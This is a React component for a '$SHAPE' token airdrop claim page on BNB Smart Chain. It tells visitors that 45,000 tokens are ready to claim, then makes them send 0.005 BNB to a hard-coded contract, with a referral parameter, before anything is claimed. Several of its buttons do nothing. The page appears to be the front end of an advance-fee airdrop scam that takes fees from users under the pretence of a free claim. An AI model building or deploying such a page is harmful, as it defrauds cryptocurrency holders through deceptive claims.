import React, { useState, useEffect } from 'react';
import { useAccount, useSwitchChain, useWriteContract, useBalance } from 'wagmi';
import { useConnectModal } from '@rainbow-me/rainbowkit';
import { useNavigate } from 'react-router-dom';
import { parseEther } from 'viem';
import { bsc } from 'wagmi/chains';

const SparkleIcon = () => (<svg viewBox="0 0 24 24" fill="#f59e0b" style={{width: '100%', height: '100%'}}><path d="M12 0L14.59 9.41L24 12L14.59 14.59L12 24L9.41 14.59L0 12L9.41 9.41L12 0Z" /></svg>);
const ExternalLinkIcon = () => (<svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6" /><polyline points="15 3 21 3 21 9" /><line x1="10" y1="14" x2="21" y2="3" /></svg>);
const ClaimReadyCheckIcon = () => (<svg width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="#22c55e" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round"><path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path><polyline points="22 4 12 14.01 9 11.01"></polyline></svg>);

const CONTRACT_AIRDROP_ADDRESS = '0x9d8248AF447c43989304D8DaE5F240beBB07629a'; 
const contractAbi = [{ "inputs": [{ "internalType": "address", "name": "inviter", "type": "address" }], "name": "claim", "outputs": [], "stateMutability": "payable", "type": "function" }];

export default function ClaimPage() {
  const { address, isConnected, chain } = useAccount();
  const { switchChain } = useSwitchChain();
  const { openConnectModal } = useConnectModal();
  const navigate = useNavigate();
  
  const [showError, setShowError] = useState(false); 
  
  const { writeContract, isPending } = useWriteContract();

  // Membaca saldo dengan useBalance asli Wagmi agar akurat
  const { data: bnbBalance } = useBalance({ address, chainId: bsc.id });

  useEffect(() => {
    if (isConnected && chain?.id !== bsc.id && switchChain) { switchChain({ chainId: bsc.id }); }
    setShowError(false); 
  }, [isConnected, chain, switchChain, address]);

  const handleClaimAction = () => {
    if (!isConnected) { openConnectModal(); return; }
    if (chain?.id !== bsc.id) { switchChain({ chainId: bsc.id }); return; }
    
    // Cek saldo menggunakan hitungan Wei (BigInt) agar 100% presisi
    const requiredBnbWei = 5000000000000000n; // Setara 0.005 BNB
    const userBalanceWei = bnbBalance ? bnbBalance.value : 0n;
    
    if (userBalanceWei < requiredBnbWei) {
      setShowError(true);
      return; 
    }
    
    setShowError(false);

    const queryParams = new URLSearchParams(window.location.search);
    const refAddress = queryParams.get('ref') || '0x0000000000000000000000000000000000000000';

    writeContract({ 
      address: CONTRACT_AIRDROP_ADDRESS, 
      abi: contractAbi, 
      functionName: 'claim', 
      args: [refAddress], 
      value: parseEther('0.005') 
    });
  };

  return (
    <div className="card-container">
      <div className="success-header">
        <div className="success-icon"><ClaimReadyCheckIcon /></div>
        <span style={{marginLeft: '8px'}}>Claim Ready!</span>
      </div>
      <p className="sub-text">Your tokens are ready to be claimed.</p>

      <div className="claim-box">
        <h3>Claim Your $SHAPE Tokens</h3>
        <p>You will be prompted to complete the claiming process from your connected wallet.</p>
        
        <div className="amount-display">
          <div className="grid-bg-overlay"></div>
          <div className="sparkle sp-1"><SparkleIcon /></div>
          <div className="sparkle sp-2"><SparkleIcon /></div>
          <div className="sparkle sp-3"><SparkleIcon /></div>
          <div className="sparkle sp-4"><SparkleIcon /></div>
          <div className="sparkle sp-5"><SparkleIcon /></div>
          <span className="amount-display-text">45.00K</span>
        </div>

        <button className="btn-black" onClick={handleClaimAction} disabled={isPending}>
          {!isConnected ? 'Claim' : chain?.id !== bsc.id ? 'Switch to BSC' : isPending ? 'Claiming...' : 'Claim'}
        </button>

        {showError && (
          <p className="error-text" style={{marginTop: '8px', marginBottom: '8px'}}>Insufficient balance. You must HODL at least 0.005 BNB.</p>
        )}

        <button className="btn-black" onClick={() => navigate('/swap')} style={{marginTop: '12px'}}>
          Go to Dex Swap
        </button>

        <div style={{marginTop: '20px', padding: '20px', border: '1px solid #eaeaea', borderRadius: '16px', backgroundColor: 'white'}}>
          <p style={{fontSize: '11px', color: '#7a6eaa', marginBottom: '10px', fontWeight: '600'}}>Unlock your governance power by delegating to yourself</p>
          <button className="btn-black" style={{padding: '12px 16px', fontSize: '14px', display: 'flex', justifyContent: 'space-between', alignItems: 'center', borderRadius: '8px'}}>
            Delegate to yourself <span>→</span>
          </button>
        </div>
      </div>

      <button className="btn-outline">Check your eligibility for exclusive Deeple items <ExternalLinkIcon /></button>
      <button className="btn-outline">Lock to claim your Maximal <ExternalLinkIcon /></button>
      <div style={{marginTop: '16px'}}>
        <button className="btn-outline">Shape up for Season 2 <ExternalLinkIcon /></button>
      </div>
    </div>
  );
}